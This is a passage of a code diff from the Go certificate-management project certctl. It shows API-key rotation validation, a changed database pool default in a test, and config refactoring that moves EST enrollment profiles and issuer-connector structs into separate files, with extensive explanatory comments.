|
||||||
|
// rotation requires DIFFERENT keys under the same name.
|
||||||
|
pairKey := name + "\x00" + key
|
||||||
|
if pairSeen[pairKey] {
|
||||||
|
return nil, fmt.Errorf("duplicate (name,key) entry for name %q — rotation requires DIFFERENT keys under the same name", name)
|
||||||
|
}
|
||||||
|
pairSeen[pairKey] = true
|
||||||
|
|
||||||
|
// Duplicate-name path: allowed iff admin flag matches the prior
|
||||||
|
// entry for the same name (L-004 rotation overlap contract).
|
||||||
|
if nameSeen[name] {
|
||||||
|
priorAdmin := nameToAdmin[name]
|
||||||
|
if priorAdmin != admin {
|
||||||
|
return nil, fmt.Errorf("duplicate key name %q with mismatched admin flag — rotation overlap requires both entries carry the same privilege level (prior=%v, this=%v)", name, priorAdmin, admin)
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
nameSeen[name] = true
|
||||||
|
nameToAdmin[name] = admin
|
||||||
|
}
|
||||||
|
|
||||||
|
keys = append(keys, NamedAPIKey{
|
||||||
|
Name: name,
|
||||||
|
Key: key,
|
||||||
|
Admin: admin,
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// Rotation-window observability: emit a one-shot startup INFO log
|
||||||
|
// per name with multiple entries so operators can see the active
|
||||||
|
// overlap state in logs. (Single-entry steady state stays silent.)
|
||||||
|
nameCounts := make(map[string]int)
|
||||||
|
for _, k := range keys {
|
||||||
|
nameCounts[k.Name]++
|
||||||
|
}
|
||||||
|
for name, count := range nameCounts {
|
||||||
|
if count > 1 {
|
||||||
|
slog.Info("api-key rotation window active",
|
||||||
|
"name", name,
|
||||||
|
"entries", count,
|
||||||
|
"see", "docs/security.md::api-key-rotation",
|
||||||
|
)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return keys, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// isValidKeyName checks if a key name is valid (alphanumeric, hyphens, underscores).
|
||||||
|
func isValidKeyName(s string) bool {
|
||||||
|
if len(s) == 0 {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
for _, c := range s {
|
||||||
|
if !((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9') || c == '-' || c == '_') {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return true
|
||||||
|
}
|
||||||
+46
-2068
File diff suppressed because it is too large
Load Diff
@@ -203,8 +203,12 @@ func TestLoad_DefaultValues(t *testing.T) {
|
|||||||
if cfg.Database.URL != "postgres://localhost/certctl" {
|
if cfg.Database.URL != "postgres://localhost/certctl" {
|
||||||
t.Errorf("Database.URL = %q, want default", cfg.Database.URL)
|
t.Errorf("Database.URL = %q, want default", cfg.Database.URL)
|
||||||
}
|
}
|
||||||
if cfg.Database.MaxConnections != 25 {
|
// Phase 6 SCALE-M1 (2026-05-14): default bumped from 25 → 50 to
|
||||||
t.Errorf("Database.MaxConnections = %d, want 25", cfg.Database.MaxConnections)
|
// relieve pool-saturation pressure on 1K+ agent fleets. The
|
||||||
|
// CERTCTL_DATABASE_MAX_CONNS override still works for operators
|
||||||
|
// who want the smaller value back; this test pins the default.
|
||||||
|
if cfg.Database.MaxConnections != 50 {
|
||||||
|
t.Errorf("Database.MaxConnections = %d, want 50", cfg.Database.MaxConnections)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -0,0 +1,396 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package config
|
||||||
|
|
||||||
|
import (
|
||||||
|
"os"
|
||||||
|
"strings"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 4 (2026-05-14): extracted from
|
||||||
|
// config.go. Same complexity shape as Sprint 3 (SCEP). Two structs
|
||||||
|
// AND five unexported helpers move together:
|
||||||
|
//
|
||||||
|
// ESTConfig — top-level multi-profile EST config
|
||||||
|
// (Enabled + Profiles slice + legacy
|
||||||
|
// single-issuer flat fields kept for
|
||||||
|
// backward compat — fewer trigger
|
||||||
|
// fields than SCEP because EST has no
|
||||||
|
// per-profile RA pair or challenge
|
||||||
|
// password in this hardening-bundle
|
||||||
|
// phase).
|
||||||
|
// ESTProfileConfig — one EST endpoint's configuration
|
||||||
|
// (PathID + IssuerID + ProfileID +
|
||||||
|
// EnrollmentPassword + MTLS gate +
|
||||||
|
// channel-binding requirement +
|
||||||
|
// allowed-auth-modes + rate-limit +
|
||||||
|
// server-keygen gate). Field surface
|
||||||
|
// spans the full RFC 7030 hardening
|
||||||
|
// bundle's per-phase plans (Phases
|
||||||
|
// 2-5).
|
||||||
|
//
|
||||||
|
// loadESTProfilesFromEnv — reads CERTCTL_EST_PROFILES + expands
|
||||||
|
// each name into an ESTProfileConfig
|
||||||
|
// via the indexed env-var family.
|
||||||
|
// Mirrors loadSCEPProfilesFromEnv
|
||||||
|
// exactly.
|
||||||
|
// parseAuthModes — splits a comma-separated env value
|
||||||
|
// into a normalized []string of
|
||||||
|
// auth-mode tokens (lowercased +
|
||||||
|
// trimmed; empty input → nil).
|
||||||
|
// Exercised by
|
||||||
|
// config_est_profiles_test.go which
|
||||||
|
// is in package `config` so the
|
||||||
|
// unexported callable surface is
|
||||||
|
// preserved by the move.
|
||||||
|
// mergeESTLegacyIntoProfiles — backward-compat shim: synthesize
|
||||||
|
// Profiles[0] from the legacy
|
||||||
|
// single-issuer fields when Profiles
|
||||||
|
// is empty AND EST is enabled.
|
||||||
|
// validESTPathID — path-segment validator (ASCII
|
||||||
|
// [a-z0-9-], no leading/trailing
|
||||||
|
// hyphen, empty allowed). Kept as a
|
||||||
|
// separate function from
|
||||||
|
// validSCEPPathID so future
|
||||||
|
// EST-specific path constraints
|
||||||
|
// (e.g. RFC 7030 §3.2.2 reserved
|
||||||
|
// segments) can land without
|
||||||
|
// affecting SCEP.
|
||||||
|
// validESTAuthMode — refuses unknown auth-mode tokens at
|
||||||
|
// startup ("mtls" and "basic" are
|
||||||
|
// the valid set in Phase 1; future
|
||||||
|
// phases may add).
|
||||||
|
//
|
||||||
|
// All callers stay in config.go and continue to resolve via
|
||||||
|
// same-package lookup. Specifically:
|
||||||
|
// - Load() calls loadESTProfilesFromEnv() during initial cfg.EST
|
||||||
|
// construction.
|
||||||
|
// - Load() calls mergeESTLegacyIntoProfiles(&cfg.EST) after the
|
||||||
|
// initial profile-load.
|
||||||
|
// - loadESTProfilesFromEnv() itself calls parseAuthModes() —
|
||||||
|
// intra-helper call that stays inside est.go after the move
|
||||||
|
// (one less cross-file edge).
|
||||||
|
// - Validate() calls validESTPathID(p.PathID) per-profile.
|
||||||
|
// - Validate() calls validESTAuthMode(mode) per auth-mode in
|
||||||
|
// each profile's AllowedAuthModes slice.
|
||||||
|
// - config_est_profiles_test.go (package `config`) directly tests
|
||||||
|
// parseAuthModes — that test file isn't touched by the move
|
||||||
|
// because parseAuthModes stays in the same package.
|
||||||
|
//
|
||||||
|
// The unexported helpers getEnv / getEnvBool / getEnvInt used by
|
||||||
|
// loadESTProfilesFromEnv also stay in config.go (shared across every
|
||||||
|
// config family); same-package resolution makes the calls work
|
||||||
|
// without any import change.
|
||||||
|
//
|
||||||
|
// Public-surface invariant: `go doc internal/config ESTConfig` and
|
||||||
|
// `go doc internal/config ESTProfileConfig` produce identical output
|
||||||
|
// before and after this split. Unexported helpers are unaffected by
|
||||||
|
// `go doc`.
|
||||||
|
|
||||||
|
// ESTConfig controls the RFC 7030 Enrollment over Secure Transport server.
|
||||||
|
// EST RFC 7030 hardening master bundle Phase 1: this type was originally a
|
||||||
|
// flat single-issuer struct. Real enterprise deployments need to expose
|
||||||
|
// multiple EST endpoints from one certctl instance — corp-laptop CA, IoT
|
||||||
|
// CA, WiFi/802.1X CA — each with its own issuer + auth modes + URL path
|
||||||
|
// (/.well-known/est/<pathID>/). The Profiles slice carries that. Existing
|
||||||
|
// operators see no behavior change: when Profiles is empty AND the legacy
|
||||||
|
// single-issuer flat fields below are set, ConfigLoad synthesizes a
|
||||||
|
// single-element Profiles[0] with PathID="" (which maps to the legacy
|
||||||
|
// /.well-known/est/ root path).
|
||||||
|
type ESTConfig struct {
|
||||||
|
// Enabled controls whether EST endpoints are available for device enrollment.
|
||||||
|
// Default: false (EST disabled). Set to true to enable RFC 7030 endpoints
|
||||||
|
// under /.well-known/est/ (cacerts, simpleenroll, simplereenroll, csrattrs).
|
||||||
|
Enabled bool
|
||||||
|
|
||||||
|
// IssuerID selects which issuer connector processes EST certificate requests.
|
||||||
|
// Default: "iss-local". Legacy single-issuer field; merged into Profiles[0]
|
||||||
|
// by mergeESTLegacyIntoProfiles when Profiles is empty.
|
||||||
|
IssuerID string
|
||||||
|
|
||||||
|
// ProfileID optionally constrains EST enrollments to a specific certificate profile.
|
||||||
|
// Legacy single-issuer field; merged into Profiles[0] when applicable.
|
||||||
|
ProfileID string
|
||||||
|
|
||||||
|
// Profiles is the multi-endpoint configuration. Each profile gets its own
|
||||||
|
// URL path (/.well-known/est/<PathID>/), its own bound issuer, its own auth
|
||||||
|
// modes, and its own per-profile policy knobs (rate limit, server-keygen
|
||||||
|
// gate, mTLS bundle, RFC 9266 channel-binding requirement). Population
|
||||||
|
// sources, in priority order:
|
||||||
|
//
|
||||||
|
// 1. Explicit list via CERTCTL_EST_PROFILES (e.g. "corp,iot,wifi").
|
||||||
|
// 2. Backward-compat shim: when CERTCTL_EST_PROFILES is unset AND the
|
||||||
|
// legacy flat fields above are populated AND Enabled=true, ConfigLoad
|
||||||
|
// synthesizes a single-element Profiles[0] with PathID="" so
|
||||||
|
// /.well-known/est/ continues to route the same way it did
|
||||||
|
// pre-Phase-1.
|
||||||
|
//
|
||||||
|
// EST RFC 7030 hardening master bundle Phase 1.
|
||||||
|
Profiles []ESTProfileConfig
|
||||||
|
}
|
||||||
|
|
||||||
|
// ESTProfileConfig is one EST endpoint's configuration. Each profile is
|
||||||
|
// bound to one issuer + one optional certctl CertificateProfile + one set
|
||||||
|
// of per-profile auth modes (mTLS / HTTP Basic / both). Future phases of
|
||||||
|
// the hardening bundle wire the additional per-profile fields:
|
||||||
|
//
|
||||||
|
// - Phase 2 reads MTLSEnabled + MTLSClientCATrustBundlePath +
|
||||||
|
// ChannelBindingRequired to enable the /.well-known/est-mtls/<PathID>
|
||||||
|
// sibling route (mirrors SCEP's /scep-mtls/<PathID> from commit e7a3075).
|
||||||
|
// - Phase 3 reads EnrollmentPassword + AllowedAuthModes to enforce HTTP
|
||||||
|
// Basic auth on the standard /.well-known/est/<PathID>/ route.
|
||||||
|
// - Phase 4 reads RateLimitPerPrincipal24h to apply per-CN+source-IP
|
||||||
|
// sliding-window rate limiting (mirrors SCEP/Intune's
|
||||||
|
// PerDeviceRateLimiter from internal/scep/intune/rate_limit.go).
|
||||||
|
// - Phase 5 reads ServerKeygenEnabled to gate the new /serverkeygen
|
||||||
|
// endpoint per RFC 7030 §4.4.
|
||||||
|
//
|
||||||
|
// Phase 1 (this commit) lays the FIELD CONTRACTS + per-profile Validate()
|
||||||
|
// gates so an operator who flips MTLSEnabled=true without supplying the
|
||||||
|
// bundle path gets a loud refuse-to-start error rather than a silent
|
||||||
|
// no-op. The actual auth/limit/keygen handlers ship in Phases 2-5.
|
||||||
|
//
|
||||||
|
// EST RFC 7030 hardening master bundle Phase 1.
|
||||||
|
type ESTProfileConfig struct {
|
||||||
|
// PathID is the URL segment after /.well-known/est/. Empty string maps
|
||||||
|
// to the legacy /.well-known/est/ root for backward compatibility (so
|
||||||
|
// existing operators with the flat single-issuer config see no URL
|
||||||
|
// change). Non-empty values MUST be a single path-safe slug
|
||||||
|
// ([a-z0-9-], no slashes); validated at startup by Config.Validate().
|
||||||
|
// Multi-profile deployments typically use short tokens like "corp",
|
||||||
|
// "iot", "wifi" — the URL becomes /.well-known/est/corp/cacerts,
|
||||||
|
// /.well-known/est/iot/simpleenroll, etc.
|
||||||
|
PathID string
|
||||||
|
|
||||||
|
// IssuerID selects which issuer connector this profile's enrollments
|
||||||
|
// go through. Must reference a configured issuer. Required (Validate
|
||||||
|
// refuses empty IssuerID).
|
||||||
|
IssuerID string
|
||||||
|
|
||||||
|
// ProfileID optionally constrains enrollments under this PathID to a
|
||||||
|
// specific CertificateProfile. Leave empty to allow the issuer's
|
||||||
|
// defaults. When non-empty, profile crypto policy (allowed key
|
||||||
|
// algorithms, required EKUs, max TTL) is enforced at enrollment time
|
||||||
|
// via service.ValidateCSRAgainstProfile.
|
||||||
|
ProfileID string
|
||||||
|
|
||||||
|
// EnrollmentPassword is the per-profile shared secret for HTTP Basic
|
||||||
|
// auth on the standard /.well-known/est/<PathID>/ route (Phase 3).
|
||||||
|
// Empty value means HTTP Basic auth is NOT required for this profile
|
||||||
|
// (mTLS-only or anonymous, depending on AllowedAuthModes). Stored only
|
||||||
|
// in process memory; never logged. Constant-time comparison via
|
||||||
|
// crypto/subtle.ConstantTimeCompare in the handler.
|
||||||
|
EnrollmentPassword string
|
||||||
|
|
||||||
|
// MTLSEnabled gates the sibling /.well-known/est-mtls/<PathID>/ route
|
||||||
|
// (Phase 2). When true, the route requires a client cert that chains
|
||||||
|
// to one of the certs in MTLSClientCATrustBundlePath. The standard
|
||||||
|
// /.well-known/est/<PathID>/ route remains application-layer-auth
|
||||||
|
// (HTTP Basic password) so existing clients keep working — mTLS is
|
||||||
|
// additive, not replacement.
|
||||||
|
//
|
||||||
|
// Mirrors SCEP's MTLSEnabled (commit e7a3075). Same defense-in-depth
|
||||||
|
// rationale: enterprise procurement teams routinely reject 'shared
|
||||||
|
// password authentication' as a checkbox-fail regardless of how
|
||||||
|
// strong the password is. This flag wires up a sibling route that
|
||||||
|
// adds client-cert auth at the handler layer.
|
||||||
|
MTLSEnabled bool
|
||||||
|
|
||||||
|
// MTLSClientCATrustBundlePath is the PEM bundle of CA certs that sign
|
||||||
|
// the client (device-bootstrap) certs the operator allows to enroll
|
||||||
|
// via the mTLS sibling route. Required when MTLSEnabled is true.
|
||||||
|
// Validated at startup by cmd/server/main.go's
|
||||||
|
// preflightESTMTLSClientCATrustBundle (Phase 2): file exists, parses
|
||||||
|
// as PEM, contains ≥1 cert, none expired.
|
||||||
|
MTLSClientCATrustBundlePath string
|
||||||
|
|
||||||
|
// ChannelBindingRequired forces the EST mTLS handler (Phase 2) to
|
||||||
|
// require RFC 9266 tls-exporter channel binding in the CSR's CMC
|
||||||
|
// id-aa-channelBindings attribute. When true, CSRs without the
|
||||||
|
// binding are refused with ErrChannelBindingMissing; mismatched
|
||||||
|
// bindings refused with ErrChannelBindingMismatch. Defaults true for
|
||||||
|
// new-cert-issuance flows (Phase 2 default), false for re-enrollment
|
||||||
|
// where the previous-cert presentation is the trust signal. Operators
|
||||||
|
// running clients that don't support RFC 9266 (older libest, etc.)
|
||||||
|
// can opt out per-profile.
|
||||||
|
//
|
||||||
|
// EST RFC 7030 hardening master bundle Phase 0 frozen decision 0.2.
|
||||||
|
ChannelBindingRequired bool
|
||||||
|
|
||||||
|
// AllowedAuthModes enumerates which application-layer auth modes
|
||||||
|
// this profile accepts. Valid entries: "mtls", "basic". Empty slice
|
||||||
|
// means no auth required (the unauthenticated default that EST
|
||||||
|
// shipped with at v2.0.66; preserved for backward compat — Validate
|
||||||
|
// emits a warning log for empty slices to nudge operators toward
|
||||||
|
// explicit opt-in). Phase 2 + 3 read this to enforce per-mode
|
||||||
|
// requirements; Phase 1 just validates shape.
|
||||||
|
//
|
||||||
|
// EST RFC 7030 hardening master bundle Phase 0 frozen decision 0.1.
|
||||||
|
AllowedAuthModes []string
|
||||||
|
|
||||||
|
// RateLimitPerPrincipal24h caps enrollments per (CSR.Subject.CN,
|
||||||
|
// sourceIP) pair in any rolling 24-hour window. Default 0 (Phase 1
|
||||||
|
// preserves the unauthenticated/unlimited default to avoid changing
|
||||||
|
// production behavior); Phase 4 will wire this against the extracted
|
||||||
|
// internal/ratelimit/SlidingWindowLimiter. Negative values are
|
||||||
|
// rejected at Validate time as a config typo.
|
||||||
|
//
|
||||||
|
// EST RFC 7030 hardening master bundle Phase 1 + Phase 4.
|
||||||
|
RateLimitPerPrincipal24h int
|
||||||
|
|
||||||
|
// ServerKeygenEnabled gates the /.well-known/est/<PathID>/serverkeygen
|
||||||
|
// endpoint (RFC 7030 §4.4) for this profile. When true, the server
|
||||||
|
// generates the keypair on behalf of the client and returns both
|
||||||
|
// cert + private key (the latter wrapped in CMS EnvelopedData).
|
||||||
|
// Default false. Phase 5 wires the handler; Phase 1 lays the gate
|
||||||
|
// + the Validate refusal for ServerKeygenEnabled=true without a
|
||||||
|
// CertificateProfile that pins AllowedKeyAlgorithms (the server
|
||||||
|
// must know what algorithm to generate).
|
||||||
|
//
|
||||||
|
// EST RFC 7030 hardening master bundle Phase 5.
|
||||||
|
ServerKeygenEnabled bool
|
||||||
|
}
|
||||||
|
|
||||||
|
// loadESTProfilesFromEnv reads the indexed CERTCTL_EST_PROFILES env var
|
||||||
|
// (e.g. "corp,iot,wifi") and expands each name into an ESTProfileConfig
|
||||||
|
// populated from CERTCTL_EST_PROFILE_<NAME>_*. Returns nil when the
|
||||||
|
// CERTCTL_EST_PROFILES env var is unset or empty — in that case the
|
||||||
|
// legacy-shim path (mergeESTLegacyIntoProfiles, called from Load after
|
||||||
|
// the initial config build) populates Profiles[0] from the flat fields
|
||||||
|
// if needed.
|
||||||
|
//
|
||||||
|
// PathID for each profile is the lowercased trimmed name from the
|
||||||
|
// CERTCTL_EST_PROFILES list (e.g. "Corp" -> "corp"). Validation that
|
||||||
|
// the PathID is path-safe ([a-z0-9-]+) lives in Config.Validate() so
|
||||||
|
// the loader can stay free of error returns.
|
||||||
|
//
|
||||||
|
// Mirrors loadSCEPProfilesFromEnv exactly. EST RFC 7030 hardening Phase 1.
|
||||||
|
func loadESTProfilesFromEnv() []ESTProfileConfig {
|
||||||
|
raw := strings.TrimSpace(os.Getenv("CERTCTL_EST_PROFILES"))
|
||||||
|
if raw == "" {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
names := strings.Split(raw, ",")
|
||||||
|
out := make([]ESTProfileConfig, 0, len(names))
|
||||||
|
for _, n := range names {
|
||||||
|
n = strings.TrimSpace(n)
|
||||||
|
if n == "" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
// The env-var key is the upper-cased name (CERTCTL_EST_PROFILE_CORP_*),
|
||||||
|
// but the URL path segment is the lower-cased name to match the
|
||||||
|
// path-safe slug constraint enforced in Validate.
|
||||||
|
envName := strings.ToUpper(n)
|
||||||
|
pathID := strings.ToLower(n)
|
||||||
|
out = append(out, ESTProfileConfig{
|
||||||
|
PathID: pathID,
|
||||||
|
IssuerID: getEnv("CERTCTL_EST_PROFILE_"+envName+"_ISSUER_ID", ""),
|
||||||
|
ProfileID: getEnv("CERTCTL_EST_PROFILE_"+envName+"_PROFILE_ID", ""),
|
||||||
|
EnrollmentPassword: getEnv("CERTCTL_EST_PROFILE_"+envName+"_ENROLLMENT_PASSWORD", ""),
|
||||||
|
MTLSEnabled: getEnvBool("CERTCTL_EST_PROFILE_"+envName+"_MTLS_ENABLED", false),
|
||||||
|
MTLSClientCATrustBundlePath: getEnv("CERTCTL_EST_PROFILE_"+envName+"_MTLS_CLIENT_CA_TRUST_BUNDLE_PATH", ""),
|
||||||
|
ChannelBindingRequired: getEnvBool("CERTCTL_EST_PROFILE_"+envName+"_CHANNEL_BINDING_REQUIRED", false),
|
||||||
|
AllowedAuthModes: parseAuthModes(getEnv("CERTCTL_EST_PROFILE_"+envName+"_ALLOWED_AUTH_MODES", "")),
|
||||||
|
RateLimitPerPrincipal24h: getEnvInt("CERTCTL_EST_PROFILE_"+envName+"_RATE_LIMIT_PER_PRINCIPAL_24H", 0),
|
||||||
|
ServerKeygenEnabled: getEnvBool("CERTCTL_EST_PROFILE_"+envName+"_SERVERKEYGEN_ENABLED", false),
|
||||||
|
})
|
||||||
|
}
|
||||||
|
return out
|
||||||
|
}
|
||||||
|
|
||||||
|
// parseAuthModes splits a comma-separated env value into a normalized
|
||||||
|
// []string of auth-mode tokens. Empty input returns nil (the
|
||||||
|
// "unauthenticated default" Phase 1 preserves for back-compat). Tokens
|
||||||
|
// are lowercased + trimmed; unknown tokens are kept as-is so Validate
|
||||||
|
// can refuse them with a typed error message naming the offending token.
|
||||||
|
func parseAuthModes(s string) []string {
|
||||||
|
s = strings.TrimSpace(s)
|
||||||
|
if s == "" {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
parts := strings.Split(s, ",")
|
||||||
|
out := make([]string, 0, len(parts))
|
||||||
|
for _, p := range parts {
|
||||||
|
p = strings.ToLower(strings.TrimSpace(p))
|
||||||
|
if p == "" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
out = append(out, p)
|
||||||
|
}
|
||||||
|
return out
|
||||||
|
}
|
||||||
|
|
||||||
|
// mergeESTLegacyIntoProfiles is the EST backward-compat shim. When
|
||||||
|
// Profiles is empty AND the legacy single-issuer fields are populated
|
||||||
|
// (Enabled=true is the trigger; IssuerID has a non-empty default so it
|
||||||
|
// can't be the trigger by itself), synthesise a single-element
|
||||||
|
// Profiles[0] with PathID="" so /.well-known/est/ dispatches identically
|
||||||
|
// to the pre-Phase-1 deploy. No-op when Profiles is non-empty (the
|
||||||
|
// operator explicitly opted into the structured form via
|
||||||
|
// CERTCTL_EST_PROFILES) or when EST is disabled.
|
||||||
|
//
|
||||||
|
// EST's legacy single-issuer config has fewer "trigger" fields than
|
||||||
|
// SCEP's (no per-profile RA pair, no per-profile challenge password —
|
||||||
|
// both of those land in Phases 2/3 of the hardening bundle). The shim
|
||||||
|
// triggers whenever EST is enabled, since the operator clearly intends
|
||||||
|
// to serve EST. This makes the back-compat behavior identical to v2.0.66
|
||||||
|
// (single /.well-known/est/ root with the operator's chosen issuer).
|
||||||
|
//
|
||||||
|
// EST RFC 7030 hardening Phase 1.
|
||||||
|
func mergeESTLegacyIntoProfiles(c *ESTConfig) {
|
||||||
|
if c == nil || !c.Enabled || len(c.Profiles) > 0 {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
c.Profiles = []ESTProfileConfig{{
|
||||||
|
PathID: "", // empty pathID maps to the legacy /.well-known/est/ root
|
||||||
|
IssuerID: c.IssuerID,
|
||||||
|
ProfileID: c.ProfileID,
|
||||||
|
// No legacy fields exist for EnrollmentPassword, MTLS*, etc. —
|
||||||
|
// those land in Phases 2/3. Operators upgrading from v2.0.66 get
|
||||||
|
// the same unauthenticated behavior they had before; opting into
|
||||||
|
// auth requires moving to the structured CERTCTL_EST_PROFILES
|
||||||
|
// form (which Phase 12 docs as the recommended migration path).
|
||||||
|
}}
|
||||||
|
}
|
||||||
|
|
||||||
|
// validESTPathID reports whether s is a valid EST profile path segment.
|
||||||
|
// Same shape as validSCEPPathID — empty string allowed (legacy root),
|
||||||
|
// otherwise ASCII lowercase letters / digits / hyphens with no
|
||||||
|
// leading/trailing hyphen. Kept as a separate function (rather than
|
||||||
|
// generalizing) so that future EST-specific path constraints (e.g. RFC
|
||||||
|
// 7030 §3.2.2 reserved path segments) can land here without affecting
|
||||||
|
// SCEP's validator.
|
||||||
|
//
|
||||||
|
// EST RFC 7030 hardening Phase 1.
|
||||||
|
func validESTPathID(s string) bool {
|
||||||
|
if s == "" {
|
||||||
|
return true // empty maps to legacy /.well-known/est/ root
|
||||||
|
}
|
||||||
|
if s[0] == '-' || s[len(s)-1] == '-' {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
for i := 0; i < len(s); i++ {
|
||||||
|
c := s[i]
|
||||||
|
if (c >= 'a' && c <= 'z') || (c >= '0' && c <= '9') || c == '-' {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
|
||||||
|
// validESTAuthMode reports whether mode is one of the documented EST
|
||||||
|
// auth modes Phase 2 + Phase 3 will dispatch on. Kept here so Validate
|
||||||
|
// can refuse unknown modes (typos, future modes the binary doesn't yet
|
||||||
|
// implement) at startup with a clear error rather than at first-request
|
||||||
|
// with a confusing 401/403.
|
||||||
|
//
|
||||||
|
// EST RFC 7030 hardening Phase 1.
|
||||||
|
func validESTAuthMode(mode string) bool {
|
||||||
|
switch mode {
|
||||||
|
case "mtls", "basic":
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
return false
|
||||||
|
}
|
||||||
@@ -0,0 +1,435 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package config
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 7 (2026-05-14): extracted from
|
||||||
|
// config.go. The LAST in-config cut of Phase 9. Sprint 7 collects
|
||||||
|
// the issuer-connector configurations — every external CA the local
|
||||||
|
// server talks UP to (StepCA, Vault, DigiCert, Sectigo, GoogleCAS,
|
||||||
|
// AWS ACM PCA, Entrust, GlobalSign, EJBCA, OpenSSL) plus the
|
||||||
|
// local CA mode + key-generation policy.
|
||||||
|
//
|
||||||
|
// Twelve structs move:
|
||||||
|
//
|
||||||
|
// KeygenConfig — global key-generation policy (Mode: "agent"
|
||||||
|
// production default, or "server" demo-only).
|
||||||
|
// CAConfig — Local CA mode: self-signed vs sub-CA
|
||||||
|
// (CertPath + KeyPath).
|
||||||
|
// StepCAConfig — step-ca issuer (URL + JWK provisioner).
|
||||||
|
// VaultConfig — HashiCorp Vault PKI (Addr + Token + Mount +
|
||||||
|
// Role + TTL).
|
||||||
|
// DigiCertConfig — DigiCert CertCentral (APIKey + OrgID +
|
||||||
|
// ProductType + BaseURL + PollMaxWait).
|
||||||
|
// SectigoConfig — Sectigo Certificate Manager (CustomerURI +
|
||||||
|
// Login + Password + OrgID + CertType + Term +
|
||||||
|
// BaseURL + PollMaxWait).
|
||||||
|
// GoogleCASConfig — Google Cloud CA Service (Project + Location +
|
||||||
|
// CAPool + Credentials + TTL).
|
||||||
|
// AWSACMPCAConfig — AWS ACM Private CA (Region + CAArn +
|
||||||
|
// SigningAlgorithm + ValidityDays +
|
||||||
|
// TemplateArn).
|
||||||
|
// EntrustConfig — Entrust Certificate Services (APIUrl + mTLS
|
||||||
|
// client cert/key + CAId + ProfileId +
|
||||||
|
// PollMaxWait).
|
||||||
|
// GlobalSignConfig — GlobalSign Atlas HVCA (APIUrl + APIKey +
|
||||||
|
// APISecret + mTLS client cert/key + ServerCA
|
||||||
|
// + PollMaxWait).
|
||||||
|
// EJBCAConfig — EJBCA / Keyfactor (APIUrl + AuthMode +
|
||||||
|
// mTLS / OAuth2 token + CAName + cert profile
|
||||||
|
// + EE profile).
|
||||||
|
// OpenSSLConfig — OpenSSL / custom CA (SignScript + RevokeScript
|
||||||
|
// + CRLScript + TimeoutSeconds).
|
||||||
|
//
|
||||||
|
// No helpers move. The bodies are pure-data field declarations —
|
||||||
|
// the simplest possible split shape since every issuer config
|
||||||
|
// struct uses only stdlib primitive types (string, int, bool) and
|
||||||
|
// no time.Duration, no nested struct, no helper-function reference.
|
||||||
|
// Verified by: `awk 'NR>=136 && NR<=269 || NR>=355 && NR<=527 ||
|
||||||
|
// NR>=586 && NR<=609' internal/config/config.go | grep -E '\btime\.
|
||||||
|
// |\bos\.|\bfmt\.'` → empty pre-move. issuers.go therefore needs
|
||||||
|
// ZERO imports beyond the package declaration.
|
||||||
|
//
|
||||||
|
// Edit shape
|
||||||
|
// ==========
|
||||||
|
// Sprint 7 used three independent sed deletes from highest-line to
|
||||||
|
// lowest-line (same pattern Sprint 6 introduced) because the 12
|
||||||
|
// issuer structs were SCATTERED across config.go interleaved with
|
||||||
|
// non-issuer types:
|
||||||
|
//
|
||||||
|
// Block 1 (top of file, after Config + OCSPResponderConfig):
|
||||||
|
// AWSACMPCAConfig (137) + EntrustConfig (168) +
|
||||||
|
// GlobalSignConfig (199) + EJBCAConfig (236).
|
||||||
|
// Followed by EncryptionConfig (271) — NOT an issuer; stays.
|
||||||
|
//
|
||||||
|
// Block 2 (middle, after the discovery configs):
|
||||||
|
// KeygenConfig (356) + CAConfig (367) + StepCAConfig (382) +
|
||||||
|
// VaultConfig (401) + DigiCertConfig (429) + SectigoConfig (458) +
|
||||||
|
// GoogleCASConfig (501).
|
||||||
|
// Followed by DigestConfig (529) — notifier-policy; stays.
|
||||||
|
//
|
||||||
|
// Block 3 (single, between HealthCheck and NetworkScan):
|
||||||
|
// OpenSSLConfig (587).
|
||||||
|
//
|
||||||
|
// What stayed in config.go
|
||||||
|
// ========================
|
||||||
|
// - OCSPResponderConfig (114) — server-side OCSP responder, not
|
||||||
|
// issuer-side; conceptually adjacent to ServerConfig (already
|
||||||
|
// moved). Could be folded into server.go in a future cut; left
|
||||||
|
// in place this sprint to keep the cut scope tight.
|
||||||
|
// - EncryptionConfig (271 pre-move) — config-at-rest encryption,
|
||||||
|
// not issuer-side.
|
||||||
|
// - The cloud-discovery family (CloudDiscoveryConfig +
|
||||||
|
// AWSSecretsMgrDiscoveryConfig + AzureKVDiscoveryConfig +
|
||||||
|
// GCPSecretMgrDiscoveryConfig) — those are DISCOVERY sources,
|
||||||
|
// not ISSUER connectors. Reading from cloud secret managers to
|
||||||
|
// find certificates someone else issued; not signing.
|
||||||
|
// - DigestConfig + HealthCheckConfig — notifier/health-monitor
|
||||||
|
// policy, not issuer-related.
|
||||||
|
// - NetworkScanConfig + VerificationConfig — discovery / verify,
|
||||||
|
// not issuer-related.
|
||||||
|
// - ApprovalConfig — RBAC issuance-approval workflow; stays per
|
||||||
|
// Sprint 6's reasoning.
|
||||||
|
// - All Load() / Validate() bodies that reference the moved
